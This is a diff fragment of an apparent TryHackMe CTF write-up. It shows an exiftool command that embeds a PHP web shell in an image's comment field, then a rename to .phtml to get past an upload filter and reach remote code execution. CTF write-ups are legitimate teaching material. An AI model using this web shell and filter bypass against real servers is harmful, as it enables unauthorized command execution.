anthares101/write-ups-page/docs/TryHackMe!/YearOfTheJellyfish.md

 ```
 exiftool -Comment="<?php echo '<form action=\''.\$PHP_SELF.'\' method=\'post\'>Command:<input type=\'text\' name=\'cmd\'><input type=\'submit\'></form>'; if(\$_POST){system(\$_POST['cmd']);} __halt_compiler();" example.jpg
 ```
 After that i renamed the image `example.jpg` to `example.jpg.phtml` and uploaded it.
-The file passed through the filer and when i checked the `assets/data/usrimg/` folder and clicked on it there it was, my little form to send commands.
+The file passed through the filer and when i checked the `assets/data/usrimg/` folder and clicked on it... there it was, my little form to send commands.
 RCE YEYYYY.

 ### flag1.txt